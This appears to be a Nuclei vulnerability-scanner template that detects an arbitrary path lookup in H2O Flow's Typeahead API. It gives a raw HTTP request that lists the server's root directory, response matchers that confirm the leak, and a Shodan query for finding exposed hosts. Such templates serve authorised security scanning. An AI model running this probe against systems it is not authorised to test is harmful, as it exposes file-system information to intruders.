46 lines
1.1 KiB
YAML
46 lines
1.1 KiB
YAML
id: h2o-arbitary-file-read
|
|
|
|
info:
|
|
name: H2O - Arbitrary Path Lookup
|
|
author: danmcinerney,byt3bl33d3r
|
|
severity: medium
|
|
description: |
|
|
H2O allows for arbitrary path lookup via it's Typehead API endpoint
|
|
reference:
|
|
- https://huntr.com/bounties/e76372c2-39be-4984-a7c8-7048a75a25dc/
|
|
classification:
|
|
cwe-id: CWE-200
|
|
cpe: cpe:2.3:a:h2o:h2o:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"H2O Flow"
|
|
product: h2o
|
|
vendor: h2o
|
|
tags: h2o-3,h2o,info-leak,lfi,misconfig
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /3/Typeahead/files?src=%2F&limit=10 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"/bin"'
|
|
- '"__meta":'
|
|
- '"schema_name":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502210097373397af40c851bd075262c1cfce1cd70242bfa9c9edb9b57e4e830079c4730220565de19b3c24bdd637f12cdf7e457b981d9c9de9d9e164bb292fddb1865a0127:922c64590222798bb761d5b6d8e72950 |